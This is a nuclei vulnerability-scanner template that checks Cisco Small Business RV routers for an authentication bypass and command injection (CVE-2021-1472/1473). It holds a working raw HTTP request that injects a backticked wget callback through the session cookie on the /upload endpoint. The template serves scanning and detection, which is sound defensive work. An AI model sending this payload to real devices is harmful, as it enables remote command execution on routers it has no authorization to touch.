nuclei-templates/vulnerabilities/other/cisco-rv-series-rce.yaml

64 lines
2.6 KiB
YAML

id: cisco-rv-series-rce
info:
name: Cisco Small Business RV Series - Authentication Bypass and Command Injection
author: gy741
severity: critical
description: |
Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote
attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more infor
mation about these vulnerabilities, see the Details section of this advisory.
reference:
- https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/
- https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-1472
- https://nvd.nist.gov/vuln/detail/CVE-2021-1473
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 9.8
cve-id: CVE-2021-1472,CVE-2021-1473
cwe-id: CWE-119
tags: cve,cve2021,cisco,rce,auth-bypass
requests:
- raw:
- |
POST /upload HTTP/1.1
Host: {{Hostname}}
Cookie: sessionid='`wget http://{{interactsh-url}}`'
Authorization: QUt6NkpTeTE6dmk4cW8=
Content-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536
-----------------------------392306610282184777655655237536
Content-Disposition: form-data; name="option"
5NW9Cw1J
-----------------------------392306610282184777655655237536
Content-Disposition: form-data; name="destination"
J0I5k131j2Ku
-----------------------------392306610282184777655655237536
Content-Disposition: form-data; name="file.path"
EKsmqqg0
-----------------------------392306610282184777655655237536
Content-Disposition: form-data; name="file"; filename="config.xml"
Content-Type: application/xml
qJ57CM9
-----------------------------392306610282184777655655237536
Content-Disposition: form-data; name="filename"
JbYXJR74n.xml
-----------------------------392306610282184777655655237536
Content-Disposition: form-data; name="GXbLINHYkFI"
<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>
-----------------------------392306610282184777655655237536--
matchers:
- type: word
part: interactsh_protocol
words:
- http